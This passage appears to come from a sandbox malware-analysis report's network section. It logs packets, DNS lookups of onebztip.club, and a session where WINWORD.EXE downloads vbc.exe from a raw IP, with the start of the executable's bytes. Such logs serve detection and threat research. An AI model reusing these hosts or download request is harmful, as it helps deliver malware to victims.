Jan 28, 2022 11:26:23.681875944 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.681931019 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.681958914 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.681987047 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682014942 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682041883 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682070971 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682100058 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682097912 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682123899 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682126999 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682130098 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682147980 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682159901 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682169914 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682169914 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682189941 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682199001 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682212114 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682228088 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682239056 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682256937 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682286024 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682287931 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682308912 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682312965 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682332039 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682341099 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682356119 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682367086 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682394028 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682394028 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682409048 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682423115 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682431936 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682450056 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682460070 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682478905 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682493925 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682508945 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682518959 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682535887 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682552099 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682564020 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682576895 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682590961 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682600975 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682616949 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682634115 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682646036 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682666063 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682672977 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682687044 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682703018 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682713032 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682729959 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682745934 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682759047 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682768106 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682785988 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682802916 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682811975 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682827950 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682837963 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682853937 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682863951 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.682878971 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.682904005 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.683042049 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.683156013 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.683188915 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.683221102 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.683248043 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.683259964 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.683264017 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.683291912 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.684010983 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.825162888 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.825226068 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.825265884 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.825305939 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.825362921 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.825412989 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.825421095 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.825464010 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.825472116 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.825505018 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.825531960 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.825534105 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.825593948 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.825602055 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.825651884 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.825659037 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.825711966 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.825725079 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.825766087 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.825771093 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.825829983 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.825835943 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.825891972 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.825936079 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.825999975 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.826009035 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.826052904 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.826057911 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.826118946 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.826121092 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.826183081 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.826184034 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.826241016 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.826256990 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.826303005 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.826303005 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.826363087 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.826364040 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.826423883 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.826423883 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.826484919 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.826484919 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.826545954 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.826546907 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.826606989 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.826606989 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.826668024 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.826668024 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.826725960 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.826756001 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.826786041 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.826786995 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.826865911 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.826881886 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.826926947 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.826947927 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.826989889 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.826997995 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.827050924 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.827078104 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.827112913 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.827131033 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.827174902 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.827182055 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.827229023 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.827244043 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.827285051 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.827296019 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.827346087 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.827351093 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.827409029 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.827414989 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.827467918 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.827481985 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.827522039 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.827522993 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.827565908 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.827596903 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.827610970 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.827627897 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.827652931 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.827665091 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.827693939 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.827713013 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.827738047 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.827744961 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.827778101 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.827819109 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.827821970 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.827857971 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.827858925 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.827891111 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.827922106 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.829119921 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.972683907 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.972748995 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.972827911 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.972986937 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.973012924 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.973567009 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.973704100 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.973790884 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.973879099 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.973906994 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.973938942 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.973948956 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.974031925 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:24.915967941 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:26.166254044 CET	49176	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:26.166320086 CET	443	49176	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:26.166424036 CET	49176	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:26.166799068 CET	49176	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:26.166831017 CET	443	49176	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:26.421281099 CET	80	49173	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:26.421349049 CET	49173	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:26.507690907 CET	443	49176	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:26.507868052 CET	49176	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:26.519474983 CET	49176	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:26.519510984 CET	443	49176	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:26.519881010 CET	443	49176	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:26.521449089 CET	49176	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:26.561865091 CET	443	49176	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:26.845422029 CET	443	49176	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:26.845468998 CET	443	49176	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:26.845527887 CET	443	49176	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:26.845560074 CET	49176	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:26.845586061 CET	49176	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:26.845588923 CET	443	49176	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:26.845650911 CET	443	49176	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:26.845700026 CET	49176	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:26.846200943 CET	49176	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:26.846235037 CET	443	49176	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:26.846252918 CET	49176	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:26.846266985 CET	443	49176	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:28.289767027 CET	49177	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:28.289803982 CET	443	49177	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:28.289889097 CET	49177	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:28.290240049 CET	49177	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:28.290252924 CET	443	49177	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:28.633719921 CET	443	49177	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:28.633873940 CET	49177	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:28.647049904 CET	49177	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:28.647094965 CET	443	49177	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:28.647564888 CET	443	49177	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:28.649189949 CET	49177	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:28.693872929 CET	443	49177	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:28.975666046 CET	443	49177	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:28.975723982 CET	443	49177	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:28.975814104 CET	443	49177	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:28.975927114 CET	49177	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:28.975967884 CET	49177	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:28.976033926 CET	49177	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:28.976582050 CET	49177	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:28.976617098 CET	443	49177	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:28.976636887 CET	49177	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:28.976655006 CET	443	49177	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:28.976667881 CET	49177	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:28.976680040 CET	443	49177	66.29.141.207	192.168.2.22
Jan 28, 2022 11:27:26.707329035 CET	49173	80	192.168.2.22	107.172.93.32

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 28, 2022 11:26:02.383935928 CET	52167	53	192.168.2.22	8.8.8.8
Jan 28, 2022 11:26:02.407804012 CET	53	52167	8.8.8.8	192.168.2.22
Jan 28, 2022 11:26:08.415513992 CET	50591	53	192.168.2.22	8.8.8.8
Jan 28, 2022 11:26:08.433037996 CET	53	50591	8.8.8.8	192.168.2.22
Jan 28, 2022 11:26:08.443614960 CET	57805	53	192.168.2.22	8.8.8.8
Jan 28, 2022 11:26:08.466133118 CET	53	57805	8.8.8.8	192.168.2.22
Jan 28, 2022 11:26:13.185450077 CET	59030	53	192.168.2.22	8.8.8.8
Jan 28, 2022 11:26:13.210005045 CET	53	59030	8.8.8.8	192.168.2.22
Jan 28, 2022 11:26:13.213280916 CET	59185	53	192.168.2.22	8.8.8.8
Jan 28, 2022 11:26:13.234019041 CET	53	59185	8.8.8.8	192.168.2.22
Jan 28, 2022 11:26:14.914890051 CET	55616	53	192.168.2.22	8.8.8.8
Jan 28, 2022 11:26:14.934413910 CET	53	55616	8.8.8.8	192.168.2.22
Jan 28, 2022 11:26:14.936966896 CET	49972	53	192.168.2.22	8.8.8.8
Jan 28, 2022 11:26:14.954175949 CET	53	49972	8.8.8.8	192.168.2.22
Jan 28, 2022 11:26:17.653501987 CET	51771	53	192.168.2.22	8.8.8.8
Jan 28, 2022 11:26:17.676848888 CET	53	51771	8.8.8.8	192.168.2.22
Jan 28, 2022 11:26:17.679116011 CET	59867	53	192.168.2.22	8.8.8.8
Jan 28, 2022 11:26:17.700962067 CET	53	59867	8.8.8.8	192.168.2.22
Jan 28, 2022 11:26:26.114847898 CET	50315	53	192.168.2.22	8.8.8.8
Jan 28, 2022 11:26:26.138176918 CET	53	50315	8.8.8.8	192.168.2.22
Jan 28, 2022 11:26:26.141361952 CET	50072	53	192.168.2.22	8.8.8.8
Jan 28, 2022 11:26:26.165575981 CET	53	50072	8.8.8.8	192.168.2.22
Jan 28, 2022 11:26:28.245870113 CET	54304	53	192.168.2.22	8.8.8.8
Jan 28, 2022 11:26:28.269277096 CET	53	54304	8.8.8.8	192.168.2.22
Jan 28, 2022 11:26:28.271676064 CET	49894	53	192.168.2.22	8.8.8.8
Jan 28, 2022 11:26:28.289124012 CET	53	49894	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 28, 2022 11:26:02.383935928 CET	192.168.2.22	8.8.8.8	0x1e4b	Standard query (0)	onebztip.club	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:08.415513992 CET	192.168.2.22	8.8.8.8	0x995b	Standard query (0)	onebztip.club	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:08.443614960 CET	192.168.2.22	8.8.8.8	0x2f29	Standard query (0)	onebztip.club	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:13.185450077 CET	192.168.2.22	8.8.8.8	0x3a0b	Standard query (0)	onebztip.club	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:13.213280916 CET	192.168.2.22	8.8.8.8	0xc51	Standard query (0)	onebztip.club	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:14.914890051 CET	192.168.2.22	8.8.8.8	0xc93c	Standard query (0)	onebztip.club	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:14.936966896 CET	192.168.2.22	8.8.8.8	0xcd43	Standard query (0)	onebztip.club	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:17.653501987 CET	192.168.2.22	8.8.8.8	0x76c0	Standard query (0)	onebztip.club	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:17.679116011 CET	192.168.2.22	8.8.8.8	0x14f6	Standard query (0)	onebztip.club	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:26.114847898 CET	192.168.2.22	8.8.8.8	0xabe8	Standard query (0)	onebztip.club	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:26.141361952 CET	192.168.2.22	8.8.8.8	0x5036	Standard query (0)	onebztip.club	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:28.245870113 CET	192.168.2.22	8.8.8.8	0x580d	Standard query (0)	onebztip.club	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:28.271676064 CET	192.168.2.22	8.8.8.8	0xc2dd	Standard query (0)	onebztip.club	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 28, 2022 11:26:02.407804012 CET	8.8.8.8	192.168.2.22	0x1e4b	No error (0)	onebztip.club	66.29.141.207	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:08.433037996 CET	8.8.8.8	192.168.2.22	0x995b	No error (0)	onebztip.club	66.29.141.207	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:08.466133118 CET	8.8.8.8	192.168.2.22	0x2f29	No error (0)	onebztip.club	66.29.141.207	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:13.210005045 CET	8.8.8.8	192.168.2.22	0x3a0b	No error (0)	onebztip.club	66.29.141.207	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:13.234019041 CET	8.8.8.8	192.168.2.22	0xc51	No error (0)	onebztip.club	66.29.141.207	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:14.934413910 CET	8.8.8.8	192.168.2.22	0xc93c	No error (0)	onebztip.club	66.29.141.207	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:14.954175949 CET	8.8.8.8	192.168.2.22	0xcd43	No error (0)	onebztip.club	66.29.141.207	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:17.676848888 CET	8.8.8.8	192.168.2.22	0x76c0	No error (0)	onebztip.club	66.29.141.207	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:17.700962067 CET	8.8.8.8	192.168.2.22	0x14f6	No error (0)	onebztip.club	66.29.141.207	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:26.138176918 CET	8.8.8.8	192.168.2.22	0xabe8	No error (0)	onebztip.club	66.29.141.207	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:26.165575981 CET	8.8.8.8	192.168.2.22	0x5036	No error (0)	onebztip.club	66.29.141.207	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:28.269277096 CET	8.8.8.8	192.168.2.22	0x580d	No error (0)	onebztip.club	66.29.141.207	A (IP address)	IN (0x0001)
Jan 28, 2022 11:26:28.289124012 CET	8.8.8.8	192.168.2.22	0xc2dd	No error (0)	onebztip.club	66.29.141.207	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

onebztip.club

107.172.93.32

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	66.29.141.207	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	66.29.141.207	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.22	49175	107.172.93.32	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 11:26:23.245330095 CET	98	OUT	GET /309/vbc.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 107.172.93.32 Connection: Keep-Alive
Jan 28, 2022 11:26:23.395608902 CET	100	IN	HTTP/1.1 200 OK Date: Fri, 28 Jan 2022 10:26:23 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27 Last-Modified: Fri, 28 Jan 2022 05:43:22 GMT ETag: "28938-5d69de9aa38e4" Accept-Ranges: bytes Content-Length: 166200 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 